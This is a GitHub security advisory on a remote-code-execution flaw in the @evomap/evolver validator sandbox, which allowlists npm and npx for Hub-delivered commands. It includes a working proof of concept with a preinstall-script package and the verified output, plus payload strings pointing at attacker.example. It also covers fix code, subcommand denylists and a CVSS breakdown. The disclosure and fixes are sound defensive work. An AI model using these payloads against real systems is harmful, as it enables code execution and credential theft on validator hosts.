@evomap/evolver's validator sandbox allowlist permits `npm`/`npx`, yielding RCE from Hub-delivered validation tasks via lifecycle scripts

High severity • GitHub Reviewed • Published Apr 27, 2026 in EvoMap/evolver • Updated May 5, 2026

Package

@evomap/evolver (npm)

Affected versions

<= 1.70.0-beta.4

Patched versions

1.70.0-beta.5

Description

Summary

The validator-mode sandbox executor (src/gep/validator/sandboxExecutor.js) places npm and npx in its hard executable allowlist. Because npm install <pkg> and npx -y -p <pkg> <bin> execute arbitrary code by design (preinstall/install/postinstall lifecycle scripts and remote-package bin entries), and because validator nodes consume validation_commands strings from unsigned Hub responses with no per-response signature check, an attacker who controls or MITMs the Hub achieves automatic remote code execution on every validator node within one daemon poll (default 60s).

Details

End-to-end chain:

  1. src/gep/validator/index.js:71-87: fetchValidationTasks() POSTs to <hub>/a2a/fetch and reads validation_tasks from the JSON response. The outbound request is signed via buildHubHeaders(), but the Hub's response is parsed directly with await res.json() and no signature is verified on data.payload.

  2. src/gep/validator/index.js:98-108: validateOneTask() extracts task.validation_commands (an array of attacker-controlled strings) and passes it straight to runInSandbox(commands, {}). No call to policyCheck.isValidationCommandAllowed() happens on this path. The author's own comment at sandboxExecutor.js:41-42 acknowledges this gap: "This closes the gap where validation_commands go straight from Hub to runInSandbox without passing through policyCheck.isValidationCommandAllowed()."

  3. src/gep/validator/sandboxExecutor.js:172-218: runSingleCommand calls parseCommand(cmd), then checks ALLOWED_EXECUTABLES.has(parsed.executable):

    // sandboxExecutor.js:35
    const ALLOWED_EXECUTABLES = new Set(['node', 'npm', 'npx']);

    parseCommand only rejects shell metacharacters (| & ; > < \ $) and unbalanced quotes. A string like "npm install /tmp/evil-pkg --no-audit --no-fund" contains none of those and parses cleanly into { executable: 'npm', args: [...] }.

  4. sandboxExecutor.js:54-66: assertNodeCommandSafe is a no-op for non-node executables:

    function assertNodeCommandSafe(parsed) {
      if (parsed.executable !== 'node') return;   // npm/npx skip every check
      ...
    }

    The BLOCKED_NODE_FLAGS set (-e, -r, --loader, etc.) therefore never gates npm or npx invocations.

  5. sandboxExecutor.js:213: spawn('npm', [...], { shell: false, cwd: sandboxDir, env }) runs npm. npm's documented behavior is to execute the package's preinstall, install, and postinstall scripts; npx downloads a remote package and executes its bin entry. Both yield arbitrary code execution with the validator process's UID and permissions.

  6. src/gep/validator/index.js:189 — the validator daemon polls every 60s by default (EVOLVER_VALIDATOR_DAEMON_INTERVAL_MS), and validator mode is on by default since v1.69.0 (isValidatorEnabled() returns true unless explicitly disabled, index.js:25-34).

The "sandbox" is nominal: it sets a fresh cwd and a stripped env (HOME → tmpdir to hide ~/.npmrc/~/.ssh), but PATH is preserved (so npm/npx resolve), there is no container/chroot/seccomp/uid drop, and nothing prevents the spawned process from writing arbitrary files, opening outbound connections, or reading any file readable by the validator process.
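Why a fresh cwd and a redirected HOME do not confine a child process can be shown with a small, harmless experiment. This is a sketch under assumptions, not the project's code: the directory names and the environment passed to the child are illustrative stand-ins for what buildSandboxEnv is described as doing, and a POSIX-like host is assumed.

```javascript
const { spawnSync } = require('node:child_process');
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Two sibling temp dirs: one plays the "sandbox", the other is outside it.
const sandboxDir = fs.mkdtempSync(path.join(os.tmpdir(), 'sandbox-'));
const outsideDir = fs.mkdtempSync(path.join(os.tmpdir(), 'outside-'));
const marker = path.join(outsideDir, 'marker.txt');

// Child script: write to an absolute path that is not under its cwd.
const script =
  'require("fs").writeFileSync(process.argv[1], "cwd=" + process.cwd())';

// Stripped env and fresh cwd, mirroring the described sandbox (assumed shape).
const child = spawnSync(process.execPath, ['-e', script, marker], {
  cwd: sandboxDir,
  env: { PATH: process.env.PATH, HOME: sandboxDir, TMPDIR: sandboxDir },
  shell: false,
});

const escaped = fs.existsSync(marker);
console.log('exit:', child.status, 'wrote outside sandbox:', escaped);
```

The child exits cleanly and the marker file appears outside sandboxDir, which is the same shape as the PoC result below: cwd and env choose where a process starts, not what it may touch.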

The author's documented threat model at sandboxExecutor.js:31-34 explicitly includes Hub compromise:

"Any command whose first token is not in this set is rejected before spawn(). This prevents command injection via Hub-delivered task.command strings even if Hub itself is compromised or mis-signs a task."

Putting npm and npx on that allowlist defeats that stated goal — both are arbitrary-code-execution-by-design tools.

PoC

Reproduced against v1.70.0-beta.4 (HEAD on main):

Step 1 — plant a malicious package locally (the remote-tarball variant works identically; npm fetches and runs lifecycle scripts in both cases):

mkdir -p /tmp/evil-pkg-validator
cat > /tmp/evil-pkg-validator/package.json <<'EOF'
{
  "name":"evil-pkg-validator","version":"1.0.0",
  "scripts":{
    "preinstall":"node -e \"require('fs').writeFileSync('/tmp/pwned-by-validator-test','RCE uid='+process.getuid()+' time='+Date.now())\""
  }
}
EOF

Step 2 — invoke the exact code path used by validateOneTask() when the Hub returns a task with validation_commands: ["npm install /tmp/evil-pkg-validator --no-audit --no-fund"]:

rm -f /tmp/pwned-by-validator-test
node -e "
const s = require('./src/gep/validator/sandboxExecutor');
s.runInSandbox(
  ['npm install /tmp/evil-pkg-validator --no-audit --no-fund'],
  { cmdTimeoutMs: 60000 }
).then(o => {
  console.log('overallOk:', o.overallOk, 'exitCode:', o.results[0].exitCode);
  console.log('PWNED:', require('fs').readFileSync('/tmp/pwned-by-validator-test','utf8'));
});"

Observed output (verified):

overallOk: true exitCode: 0
PWNED: RCE uid=0 time=1777213140205

The sandbox reports overallOk: true (it sees a clean exit-0 from npm), while the preinstall script has already written /tmp/pwned-by-validator-test outside the sandbox directory — uncontained code execution as the validator UID.

Remote-only variant (no local file required): a compromised or MITM'd Hub returns:

{ "validation_commands": ["npm install https://attacker.example/evil.tgz --no-audit --no-fund"] }

or

{ "validation_commands": ["npx -y -p evil-pkg@1.0.0 evil-cmd"] }

Both pass parseCommand() (no shell metacharacters), pass ALLOWED_EXECUTABLES.has('npm'|'npx'), and assertNodeCommandSafe is a no-op for them. npm/npx fetch the remote tarball and execute its lifecycle/bin scripts on the validator host.
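The three gates can be modelled in a few lines to see why these strings get through. This is a simplified sketch reconstructed from the description in this advisory, not a copy of sandboxExecutor.js: parseCommandSketch and gate are hypothetical names, quote handling is omitted, and BLOCKED_NODE_FLAGS lists only the flags named above.

```javascript
// Simplified model of the checks described in this advisory.
// NOT the real sandboxExecutor.js; names and details are illustrative.
const ALLOWED_EXECUTABLES = new Set(['node', 'npm', 'npx']);
const BLOCKED_NODE_FLAGS = new Set(['-e', '-r', '--loader']); // partial list

// Reject shell metacharacters, then split on whitespace.
// (Quote handling is left out of this sketch.)
function parseCommandSketch(cmd) {
  if (/[|&;><\\$]/.test(cmd)) throw new Error('shell metacharacter');
  const [executable, ...args] = cmd.trim().split(/\s+/);
  return { executable, args };
}

function assertNodeCommandSafe(parsed) {
  if (parsed.executable !== 'node') return; // npm/npx skip every check
  for (const arg of parsed.args) {
    if (BLOCKED_NODE_FLAGS.has(arg)) {
      throw new Error('blocked node flag: ' + arg);
    }
  }
}

// Returns true when a command would reach spawn() in this model.
function gate(cmd) {
  try {
    const parsed = parseCommandSketch(cmd);
    if (!ALLOWED_EXECUTABLES.has(parsed.executable)) return false;
    assertNodeCommandSafe(parsed);
    return true;
  } catch {
    return false;
  }
}

for (const cmd of [
  'npm install https://attacker.example/evil.tgz --no-audit --no-fund',
  'npx -y -p evil-pkg@1.0.0 evil-cmd',
  'node -e process.exit(0)',
  'bash -c id',
]) {
  console.log(gate(cmd) ? 'PASS ' : 'BLOCK', cmd);
}
```

In this model only the node -e and bash strings are stopped; both npm and npx payloads reach the spawn step untouched.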

Impact

  • Arbitrary code execution as the evolver/validator process UID on every validator node that polls the malicious Hub (one cycle ≈ 60s by default).
  • Credential exfiltration: HUB_NODE_SECRET, A2A node identity, any cloud/cred material readable by the process.
  • Persistence / lateral movement: write to user-writable cron, systemd-user units, shell rc files; pivot into the host's container / VM.
  • Wormable across the network: a single Hub compromise auto-RCEs every node running validator mode — and validator mode is opt-out / on by default since v1.69.0.
  • Defeats the documented sandbox guarantee: the executor advertises defense against a compromised Hub; in practice, two of its three allowed binaries are arbitrary-code-execution tools.

Recommended Fix

Remove npm and npx from ALLOWED_EXECUTABLES. Validation tasks need only node <script>:

// src/gep/validator/sandboxExecutor.js
const ALLOWED_EXECUTABLES = new Set(['node']);

If npm test style commands must remain reachable from the Hub path, gate npm explicitly and keep rejecting npx, which always fetches and executes:

function assertNpmCommandSafe(parsed) {
  if (parsed.executable !== 'npm' && parsed.executable !== 'npx') return;
  // Block install/exec/run-script that fetch or execute lifecycle scripts.
  const sub = parsed.args.find((a) => !a.startsWith('-'));
  const FORBIDDEN = new Set(['install', 'i', 'add', 'ci', 'exec', 'x', 'run', 'run-script', 'rebuild', 'pack', 'publish']);
  if (FORBIDDEN.has(sub)) {
    throw new Error('npm/npx subcommand not allowed in sandbox: ' + sub);
  }
  // Require --ignore-scripts on every npm invocation as defense-in-depth.
  if (parsed.executable === 'npm' && !parsed.args.includes('--ignore-scripts')) {
    throw new Error('npm in sandbox requires --ignore-scripts');
  }
  // npx always fetches+executes — disallow entirely.
  if (parsed.executable === 'npx') {
    throw new Error('npx is not allowed in sandbox');
  }
}
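A denylist of subcommands is brittle in two ways: npm accepts further aliases for install (for example isntall), and picking the first non-flag token can mistake an option value for the subcommand (as in npm --prefix /x install). An allowlist variant avoids both. The following is a sketch only, assuming that npm test is the single npm shape the Hub path needs; assertNpmCommandAllowlisted and both sets are hypothetical names, not part of the project.

```javascript
// Hypothetical allowlist variant: accept only exact, pre-approved npm shapes.
const ALLOWED_NPM_SUBCOMMANDS = new Set(['test']); // assumption: only `npm test`
const ALLOWED_NPM_FLAGS = new Set(['--ignore-scripts', '--silent']);

function assertNpmCommandAllowlisted(parsed) {
  if (parsed.executable === 'npx') {
    throw new Error('npx is not allowed in sandbox');
  }
  if (parsed.executable !== 'npm') return;

  const [sub, ...rest] = parsed.args;
  // The subcommand must come first, so an option value cannot pose as it.
  if (!ALLOWED_NPM_SUBCOMMANDS.has(sub)) {
    throw new Error('npm subcommand not allowed in sandbox: ' + sub);
  }
  // Every remaining argument must be a known, value-less flag.
  for (const arg of rest) {
    if (!ALLOWED_NPM_FLAGS.has(arg)) {
      throw new Error('npm argument not allowed in sandbox: ' + arg);
    }
  }
  if (!rest.includes('--ignore-scripts')) {
    throw new Error('npm in sandbox requires --ignore-scripts');
  }
}

// Usage: passes silently for the approved shape, throws for everything else.
assertNpmCommandAllowlisted({ executable: 'npm', args: ['test', '--ignore-scripts'] });
```

Note that --ignore-scripts suppresses pre- and post-scripts but npm test still runs the package's own test script, so this gate narrows the attack surface without replacing real isolation.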

Additionally:

  1. Sign the Hub's /a2a/fetch response the same way outbound requests are signed (buildHubHeaders). Verify the signature on data.payload in fetchValidationTasks before handing tasks to runInSandbox. This closes the network-MITM variant that does not require Hub compromise.
  2. Run runInSandbox under real isolation — drop privileges, disable network, mount tmpfs, apply seccomp — rather than relying solely on an allowlist. The current buildSandboxEnv only redirects HOME/TMPDIR; the spawned process otherwise has full host access.
  3. Apply policyCheck.isValidationCommandAllowed() to Hub-delivered validation_commands in validateOneTask, mirroring the gate that already exists for capsule-derived commands in solidify.js / skill2gep.js.
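Item 1 can be sketched with an HMAC over the raw response body. Everything here is an assumption made for illustration: the advisory does not specify the signing scheme used by buildHubHeaders, so the shared secret, the hex encoding, and the helper names signBody and parseVerifiedResponse are hypothetical.

```javascript
const crypto = require('node:crypto');

// Hypothetical helper: HMAC-SHA256 over the exact response bytes.
function signBody(rawBody, secret) {
  return crypto.createHmac('sha256', secret).update(rawBody).digest('hex');
}

// Returns the parsed payload only if the signature matches; throws otherwise.
function parseVerifiedResponse(rawBody, signatureHex, secret) {
  const expected = Buffer.from(signBody(rawBody, secret), 'hex');
  const received = Buffer.from(String(signatureHex || ''), 'hex');
  // timingSafeEqual throws on length mismatch, so compare lengths first.
  if (
    received.length !== expected.length ||
    !crypto.timingSafeEqual(received, expected)
  ) {
    throw new Error('Hub response signature mismatch');
  }
  return JSON.parse(rawBody); // parse only after verification
}

// Usage with made-up values.
const secret = 'demo-secret';
const body = JSON.stringify({ validation_tasks: [] });
const signature = signBody(body, secret);
console.log(parseVerifiedResponse(body, signature, secret));
```

To apply this shape in fetchValidationTasks, the body would need to be read as text (rather than via res.json()) so that verification covers the exact bytes received. A shared-secret scheme like this addresses only the MITM variant; a fully compromised Hub would hold the secret too, which is why items 2 and 3 remain necessary.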

References

autogame-17 published to EvoMap/evolver Apr 27, 2026
Published to the GitHub Advisory Database May 5, 2026
Reviewed May 5, 2026
Last updated May 5, 2026

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: High
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
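
The vector string can be turned into a numeric base score with the formulas from the CVSS v3.1 specification. A minimal sketch follows, handling only Scope: Unchanged vectors; baseScore and roundUp are illustrative names, and the metric weights are the published v3.1 values.

```javascript
// Metric weights from the CVSS v3.1 specification
// (PR values shown are the ones for Scope: Unchanged).
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 },
  UI: { N: 0.85, R: 0.62 },
  C: { H: 0.56, L: 0.22, N: 0 },
  I: { H: 0.56, L: 0.22, N: 0 },
  A: { H: 0.56, L: 0.22, N: 0 },
};

// Spec-defined rounding: smallest one-decimal value >= input,
// computed on integers to avoid floating-point drift.
function roundUp(input) {
  const scaled = Math.round(input * 100000);
  return scaled % 10000 === 0
    ? scaled / 100000
    : (Math.floor(scaled / 10000) + 1) / 10;
}

function baseScore(vector) {
  // "CVSS:3.1/AV:N/..." -> { AV: 'N', ... } (the version prefix is dropped).
  const m = Object.fromEntries(
    vector.split('/').slice(1).map((part) => part.split(':'))
  );
  if (m.S !== 'U') throw new Error('sketch handles Scope: Unchanged only');
  const w = (key) => WEIGHTS[key][m[key]];
  const iss = 1 - (1 - w('C')) * (1 - w('I')) * (1 - w('A'));
  const impact = 6.42 * iss;
  const exploitability = 8.22 * w('AV') * w('AC') * w('PR') * w('UI');
  return impact <= 0 ? 0 : roundUp(Math.min(impact + exploitability, 10));
}

console.log(baseScore('CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H')); // 8.1
```

For this advisory's vector the sketch yields 8.1, which falls in the High band (7.0 to 8.9) and agrees with the severity label above.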

Weaknesses

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

CVE ID

No known CVE

GHSA ID

GHSA-jxh8-jh77-xh6g
